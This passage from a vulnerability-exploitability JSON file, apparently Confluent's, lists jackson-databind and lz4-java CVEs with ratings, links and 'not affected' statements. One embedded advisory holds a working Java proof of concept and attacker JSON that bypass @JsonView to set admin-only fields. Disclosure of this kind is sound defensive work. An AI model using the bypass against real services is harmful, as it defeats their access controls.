          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#d6d592d5-31c9-463e-82a0-4409fb3a9b47"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#adc9aa3d-91b0-4427-9a42-2d57fc5a6e9b"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#f9d58eae-2579-44ef-9b86-a870794e23be"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#59fed5a4-f6ad-4bf4-9173-0bc11d198b91"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#d4fa54fd-6bfb-4a0a-b99c-b9943c7e58b4"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#d7135540-02ce-4c73-be61-129aec36bb11"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#a7e5df3b-5d7a-4f08-9108-3e09c68a3a11"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. MapperFeature.ACCEPT_CASE_INSENSITIVE_PROPERTIES is not enabled in the product, so the case-insensitive @JsonIgnoreProperties bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-59888",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        915
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.15.0 until 2.18.8, 2.21.4, and 3.1.4, Java Records using a PropertyNamingStrategy can bypass @JsonIgnore because POJOPropertiesCollector._removeUnwantedIgnorals() records an ignored component under its original implicit name before _renameUsing() applies the naming strategy, allowing the renamed JSON key to be assigned to the Record constructor parameter. This issue is fixed in versions 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59888"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59888"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/baa2cdf5ca2b2717fbb88d91955d69d8651df3e4"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/c7c678360624da5bc7eed2152789fa522880db9d"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5974"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-3pjw-73gf-8qr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59888"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59888"
        }
      ],
      "published": "2026-07-14T17:17:15+00:00",
      "updated": "2026-07-15T20:18:23+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:032cfb2d-9f0d-4398-9524-dc61f4303447/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#6aadec1e-67f1-4295-a31f-0cca5e9c6a75"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#da81c428-bdc3-4b4e-95a0-9ea1c83fde9b"
        },
        {
          "ref": "urn:cdx:18887482-e12e-40ec-af4e-627193cbd5ab/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#c5274910-28c8-433d-a4d4-d0b636683cd4"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#f9ce033a-5ea3-4101-b59b-cee17d306ea0"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ed5fabfc-04cb-4427-8f07-5398c583b7dd"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#e53ba2a0-de41-40c2-947e-9d11154eb259"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#fe312216-1e47-4bc6-ac95-a59624912519"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#f2bf07d6-7d44-418f-b71f-65330e8185bf"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#e73e80f8-d184-4c12-baca-95731306f31d"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f70b3f98-3fc9-4eca-b669-1ebe8c7b69b3"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fc2f580b-2a5d-4096-8752-c8db80a300fe"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fddb0645-966c-470e-94ec-50262d724477"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f759b9f7-33a7-4450-8002-24f702debfeb"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#d6d592d5-31c9-463e-82a0-4409fb3a9b47"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#adc9aa3d-91b0-4427-9a42-2d57fc5a6e9b"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#f9d58eae-2579-44ef-9b86-a870794e23be"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#59fed5a4-f6ad-4bf4-9173-0bc11d198b91"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#d4fa54fd-6bfb-4a0a-b99c-b9943c7e58b4"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#d7135540-02ce-4c73-be61-129aec36bb11"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#a7e5df3b-5d7a-4f08-9108-3e09c68a3a11"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59889",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        863
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.18.0 until 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1, UnwrappedPropertyHandler.processUnwrapped() replays buffered JSON for a @JsonUnwrapped property and calls prop.deserializeAndSet() without a prop.visibleInView(ctxt.getActiveView()) guard, allowing a property annotated with both @JsonView and @JsonUnwrapped to be written from attacker JSON under a less-privileged active view. This issue is fixed in versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.21.5, 2.18.9, 2.22.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59889"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/d627a8a86fcb062429282f79f3f256f181ed2c7b"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/6060"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/6056"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-5gvw-p9qm-jgwh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59889"
        }
      ],
      "published": "2026-07-14T21:17:06+00:00",
      "updated": "2026-07-16T16:19:15+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:032cfb2d-9f0d-4398-9524-dc61f4303447/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#6aadec1e-67f1-4295-a31f-0cca5e9c6a75"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#da81c428-bdc3-4b4e-95a0-9ea1c83fde9b"
        },
        {
          "ref": "urn:cdx:18887482-e12e-40ec-af4e-627193cbd5ab/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#c5274910-28c8-433d-a4d4-d0b636683cd4"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#f9ce033a-5ea3-4101-b59b-cee17d306ea0"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ed5fabfc-04cb-4427-8f07-5398c583b7dd"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#e53ba2a0-de41-40c2-947e-9d11154eb259"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#fe312216-1e47-4bc6-ac95-a59624912519"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#f2bf07d6-7d44-418f-b71f-65330e8185bf"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#e73e80f8-d184-4c12-baca-95731306f31d"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f70b3f98-3fc9-4eca-b669-1ebe8c7b69b3"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fc2f580b-2a5d-4096-8752-c8db80a300fe"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fddb0645-966c-470e-94ec-50262d724477"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f759b9f7-33a7-4450-8002-24f702debfeb"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#d6d592d5-31c9-463e-82a0-4409fb3a9b47"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#adc9aa3d-91b0-4427-9a42-2d57fc5a6e9b"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#f9d58eae-2579-44ef-9b86-a870794e23be"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#59fed5a4-f6ad-4bf4-9173-0bc11d198b91"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#d4fa54fd-6bfb-4a0a-b99c-b9943c7e58b4"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#d7135540-02ce-4c73-be61-129aec36bb11"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#a7e5df3b-5d7a-4f08-9108-3e09c68a3a11"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59949",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "yawkat LZ4 Java provides LZ4 compression for Java. Prior to 1.11.1, JNI-backed XXHash implementations fail to validate the byte array object and the off and len arguments in XXHashFactory.nativeInstance().hash32().hash(), XXHashFactory.nativeInstance().hash64().hash(), XXHashFactory.nativeInstance().newStreamingHash32().update(), and XXHashFactory.nativeInstance().newStreamingHash64().update(), allowing null arrays or oversized ranges to reach native code, read outside the Java array, and fatally terminate the JVM. This issue is fixed in version 1.11.1.",
      "recommendation": "Upgrade at.yawk.lz4:lz4-java to version 1.11.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59949"
        },
        {
          "url": "https://github.com/yawkat/lz4-java"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/commit/dbd86d04b8dd716e1c2bc626be54189997d910da"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/releases/tag/v1.11.1"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/security/advisories/GHSA-xx22-p4ch-683r"
        }
      ],
      "published": "2026-08-18T15:16:56+00:00",
      "updated": "2026-08-18T18:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:maven/at.yawk.lz4/lz4-java@1.10.2",
          "versions": [
            {
              "version": "1.10.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#4f50b549-9ce6-4e00-a405-1a4bb59affc4"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#fdfd2d4e-5b0f-42c4-9e0a-d54bb71e39f8"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:470bfbc2-134e-46c3-81ae-3373b75a50a8/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#f937343d-881a-4327-afbd-aeb38128e149"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#e512b0ae-a3cd-4518-a23a-f7fa37b394ba"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#e5f63c97-b2d7-49d2-bfda-6300f544179e"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#94670332-f799-444d-b9f4-245c0b98643b"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#fdcd8110-4da8-48bc-b420-fc74e1751f9d"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#ca96c25a-2e8a-41a6-8956-229f1d288168"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f3e8bd7e-3c65-4823-bf2f-c66589682309"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#ecd2195a-e0b1-4ef0-b28d-d47a05ce364b"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#d201e8cc-1dd5-4e09-a195-35e0afeed857"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e840d7b1-53e8-40d9-abda-82d1b8f7c1ec"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#e33f64e0-73c9-444c-815a-649c097604c6"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#5e9a41ce-5948-4167-9b00-c3010790c06d"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d4c9777d-5374-478d-b2a9-00c1ab38e252"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Kafka's own bundled LZ4 codec, which every CP repo relies on transitively for record-batch compression, only ever calls the always-safe one-shot XXHash hash() API with non-null, internally-bounded buffers; the vulnerable streaming update() API is never called anywhere in the CP repo set."
      }
    },
    {
      "id": "GHSA-mhm7-754m-9p8w",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "description": "## Summary\n\nIn `BeanDeserializer.deserializeUsingPropertyBasedWithExternalTypeId`, the active-view (`@JsonView`) filter was applied only to the regular bean-property branch; the creator-property branch performed no `creatorProp.visibleInView(activeView)` check. A constructor parameter annotated with both `@JsonView(RestrictedView.class)` and `@JsonTypeInfo(use=Id.NAME,\n  include=As.EXTERNAL_PROPERTY)` is populated from attacker JSON even when a more restrictive view is active.\n\n  This is a patch gap. GHSA-5hh8 (CVE-2026-54517) and GHSA-rcqc (CVE-2026-54518) descriptions cover only the main property-based path and the unwrapped-creator path respectively; the external-type-id creator path was fixed on the 3.x line via #6004 (\"Extend #5969/#5971 fixes to ... external-type-id case in regular BeanDeserializer\", commit 7dc7a17, 2026-05-22) but\n  **the fix was never backported to 2.21 or 2.18**. Users on 2.21.4 and 2.18.8 who upgraded per the published advisories remain vulnerable to the same `@JsonView` bypass technique via a different code path.\n\n## Vulnerable Code Path\n\nFile: `com/fasterxml/jackson/databind/deser/BeanDeserializer.java`\nMethod: `deserializeUsingPropertyBasedWithExternalTypeId`\n\nOn 2.21.4 (and 2.18.8), the creator-property branch (around line 1125-1158) checks `creatorProp.isInjectionOnly()` and hands off to `ext.handlePropertyValue(...)` / `buffer.assignParameter(...)` without ever consulting `visibleInView(activeView)`:\n\n ```java\n  if (creatorProp != null) {\n      // [databind#1381]: if useInput=FALSE, skip deserialization from input\n      if (creatorProp.isInjectionOnly()) { ... }\n      // NO visibleInView(activeView) CHECK HERE\n      if (!ext.handlePropertyValue(p, ctxt, propName, null)) {\n          if (buffer.assignParameter(creatorProp, ...)) { ... }\n      }\n      continue;\n  }\n```\n\nOn 3.1.4, the same branch contains the additional guard (commit 7dc7a17):\n\n ```java\n   if (creatorProp != null) {\n      // [databind#5971]: must honor active view here too\n      if ((activeView != null) && !creatorProp.visibleInView(activeView)) {\n          p.skipChildren();\n          continue;\n      }\n      ...\n  }\n```\n\nThe 2.21 and 2.18 backport PRs (#6005 and #6003) only backported the main-path fixes from #5969/#5971; the external-type-id fix from #6004 was not backported. The maintainer closed #6005\n  with \"got changes merged forward, looks like it's all covered now\", but the forward-merge did not include the ExtTypeId creator branch.\n\n  Proof of Concept\n\n  Compiles and runs against jackson-databind 2.21.4:\n \n```java\n  import com.fasterxml.jackson.annotation.*;\n  import com.fasterxml.jackson.databind.ObjectMapper;\n\n  public class JsonViewExternalTypeIdBypass {\n      public static class PublicView {}\n      public static class AdminView extends PublicView {}\n\n      public static abstract class Asset { public String name; }\n      public static class PublicAsset extends Asset {}\n      public static class AdminAsset extends Asset { public String secret; }\n\n      public static class Container {\n          @JsonTypeInfo(use = JsonTypeInfo.Id.NAME,\n                  include = JsonTypeInfo.As.EXTERNAL_PROPERTY,\n                  property = \"kind\")\n          @JsonSubTypes({\n              @JsonSubTypes.Type(value = PublicAsset.class, name = \"pub\"),\n              @JsonSubTypes.Type(value = AdminAsset.class,  name = \"admin\")\n          })\n          @JsonView(AdminView.class)\n          public Asset asset;\n\n          public String label;\n\n          @JsonCreator\n          public Container(\n                  @JsonProperty(\"label\") String label,\n                  @JsonProperty(\"asset\") @JsonView(AdminView.class) Asset asset) {\n              this.label = label;\n              this.asset = asset;\n          }\n      }\n\n      public static class Wrapper {\n          @JsonView(PublicView.class)\n          public Container data;\n      }\n\n      public static void main(String[] args) throws Exception {\n          // Admin-only \"asset\" should be blocked when reading with PublicView\n          String json = \"{\\\"data\\\":{\\\"label\\\":\\\"hello\\\",\\\"kind\\\":\\\"admin\\\",\"\n                      + \"\\\"asset\\\":{\\\"name\\\":\\\"foo\\\",\\\"secret\\\":\\\"LEAKED\\\"}}}\";\n\n          ObjectMapper om = new ObjectMapper();\n          Wrapper r = om.readerWithView(PublicView.class)\n                  .forType(Wrapper.class)\n                  .readValue(json);\n\n          System.out.println(r.data);\n          // Actual on 2.21.4:   Container{label='hello', asset=AdminAsset{name='foo', secret='LEAKED'}}\n          // Expected (secure):  Container{label='hello', asset=null}\n          if (r.data.asset != null && r.data.asset instanceof AdminAsset) {\n              System.out.println(\"[!!] BYPASS CONFIRMED \u2014 admin-only asset populated under PublicView\");\n          }\n      }\n  }\n```\n\nA control case that removes include = As.EXTERNAL_PROPERTY (forcing the normal property-based path) correctly returns asset = null, confirming the bypass is specific to the ExternalTypeId\n  code path and not a misconfiguration.\n\n### Impact\n\n  View-restricted (e.g. admin-only) creator properties can be populated from untrusted input where @JsonView is used as a write-side authorization boundary. Typical victims are Spring Boot\n  REST controllers that use @JsonView(PublicView.class) on the request body to whitelist user-settable fields \u2014 an attacker can inject the restricted creator parameter (including choosing\n  the polymorphic subtype via the sibling kind/type-id property) by combining it with a polymorphic @JsonTypeInfo(EXTERNAL_PROPERTY) annotation on the same field.\n\n- CWE-863 (Incorrect Authorization)\n- Same impact class as CVE-2026-54517 / CVE-2026-54518\n- No RCE, no DoS \u2014 this is an access-control / mass-assignment bypass\n\n### Trigger Conditions\n\nDeveloper code must combine (no opt-in user configuration required):\n\n1. Property-based @JsonCreator on the outer type\n2. A creator parameter annotated with @JsonView(RestrictedView.class)\n3. The same parameter annotated with @JsonTypeInfo(use=Id.NAME, include=As.EXTERNAL_PROPERTY, property=\"...\")",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.9, 2.21.5",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-mhm7-754m-9p8w"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/c628b357ed143d8492756d5c1458cfb9fbeb29ed"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/dea7eb466e98cc226c4ac65587581fb49926820c"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-mhm7-754m-9p8w"
        }
      ],
      "published": "2026-07-21T19:40:12+00:00",
      "updated": "2026-07-21T19:40:12+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:032cfb2d-9f0d-4398-9524-dc61f4303447/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#6aadec1e-67f1-4295-a31f-0cca5e9c6a75"
        },
        {
